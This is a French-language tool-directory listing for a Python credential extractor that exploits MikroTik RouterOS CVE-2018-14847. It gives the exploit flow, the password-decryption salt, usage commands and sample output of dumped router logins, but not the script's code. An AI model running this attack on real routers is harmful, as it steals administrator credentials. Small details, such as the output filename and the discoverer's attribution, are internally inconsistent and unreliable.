Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
VULNERAVEL-CVE-2018-14847---CREDENCIAIS-EXTRAIDAS — VULNERAVEL CVE-2018-14847 - CREDENCIAIS EXTRAIDAS MIKROTIK EM PYTHON | Kitploit
Outils/GitHubGitHub/mourafuseti/vulneravel-cve-2018-14847---credenciais-extraidas
Sécurité IoTAttaques de Mots de PasseAnalyse des VulnérabilitésExploitationSécurité RéseauRed Teaming
GitHubmourafuseti/vulneravel-cve-2018-14847---credenciais-extraidas

VULNERAVEL-CVE-2018-14847---CREDENCIAIS-EXTRAIDAS

VULNERAVEL CVE-2018-14847 - CREDENCIAIS EXTRAIDAS MIKROTIK EM PYTHON

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
130il y a 3 moisPas encore vérifié

Outils de Pentest — /rede

Dépôt de scripts pour l'audit et les tests d'intrusion réseau.
Utilisez uniquement sur des appareils avec autorisation formelle.


CVE-2018-14847 — MikroTik Winbox Credential Extractor

Description

Exploite la vulnérabilité de lecture de fichier non authentifiée dans le service Winbox de MikroTik RouterOS. Le gestionnaire de fichiers (gestionnaire ID 2) ne valide pas l'authentification, permettant à un attaquant externe de lire le fichier user.dat qui contient tous les utilisateurs et mots de passe de l'appareil.

Les mots de passe sont stockés chiffrés avec XOR en utilisant la clé MD5(usuario + "283i4jfkai3389"). Le script effectue le déchiffrement automatiquement.

Versions affectées

BrancheVulnerable jusqu'àVersion corrigée
Stable6.426.42.1
Long-term6.40.76.40.8
RC6.426.43

Prérequis

  • Python 3.x (aucune dépendance externe)
  • Port 8291 (Winbox) accessible sur la cible

Utilisation

root@kitploit:~
python3 cve_2018_14847.py <IP>
python3 cve_2018_14847.py <IP> --port 8291

Exemples

root@kitploit:~
# Cible par défaut sur le port 8291
python3 cve_2018_14847.py 192.168.1.1

# Port personnalisé
python3 cve_2018_14847.py 192.168.1.1 --port 8291

Déroulement de l'exploit

root@kitploit:~
1. Se connecte au port 8291 (Winbox)
        ↓
2. Envoie FIRST_PAYLOAD — ouvre session + demande /flash/rw/store/user.dat
        ↓
3. Extrait l'ID de session du byte 38 de la réponse
        ↓
4. Injecte l'ID de session dans le byte 19 du SECOND_PAYLOAD
        ↓
5. Envoie SECOND_PAYLOAD — lit le fichier user.dat
        ↓
6. Analyse les entrées M2 → extrait l'utilisateur et le mot de passe chiffré
        ↓
7. Déchiffre le mot de passe : XOR avec MD5(usuario + salt)
        ↓
8. Affiche les identifiants et sauvegarde dans un fichier

Sortie attendue

root@kitploit:~
═══════════════════════════════════════════════════════
  CVE-2018-14847  —  Vidage d'identifiants Winbox MikroTik
  Lecture de fichier non authentifiée + Déchiffrement de mot de passe
  Affecté : RouterOS 6.29 – 6.42 (< 6.40.8 / 6.42.1)
═══════════════════════════════════════════════════════
  Cible : 192.168.1.1:8291
  Date  : 2026-05-20 18:06:58

[*] Connexion à 192.168.1.1:8291 ...
[+] Connecté au service Winbox.
[*] Envoi du payload 1 (demande de fichier) ...
[+] Réponse reçue (84 octets). ID de session : 0x35
[*] Envoi du payload 2 (lecture du user.dat) ...
[+] Données reçues (312 octets).
[*] Analyse du user.dat (257 octets utiles) ...

═══════════════════════════════════════════════════════
  IDENTIFIANTS EXTRAITS
═══════════════════════════════════════════════════════
  Utilisateur : admin
  Mot de passe : senha123
  Combo   : admin:senha123
───────────────────────────────────────────────────────
[+] 1 identifiant(s) trouvé(s).
[+] Résultat sauvegardé dans : mikrotik_1192.168.1.1_20260520_180658.txt

Fichier de sortie

Le résultat est sauvegardé automatiquement dans :

root@kitploit:~
mikrotik_<IP>_<TIMESTAMP>.txt

Exemple : mikrotik_192.168.1.1_20260520_180658.txt

Contient : IP de la cible, date, CVE, version affectée et toutes les paires utilisateur:mot de passe.

Références

  • CVE : CVE-2018-14847
  • Exploit-DB : EDB-ID #45170
  • Découverte originale : Omid Shojaei (@Dmitriy_area51)
  • Divulgation : Avril 2018

Structure du dossier

root@kitploit:~
/rede/
├── README.md                        # ce fichier
├── cve_2018_14847.py                # MikroTik Winbox Credential Extractor
├── pentest_cgnat_100.64.0.0.md      # rapport de pentest CGNAT
├── pentest_roteador_192.168.2.1.md  # rapport de pentest routeur
└── mikrotik_<IP>_<TIMESTAMP>.txt    # résultats générés par le script

AVIS JURIDIQUE : Ces outils sont destinés à une utilisation exclusive dans des environnements autorisés. L'exécution non autorisée contre des systèmes tiers est un crime prévu par la loi 12.737/2012 (Loi Carolina Dieckmann) et par l'Art. 154-A du Code pénal brésilien.

Télécharger l’outil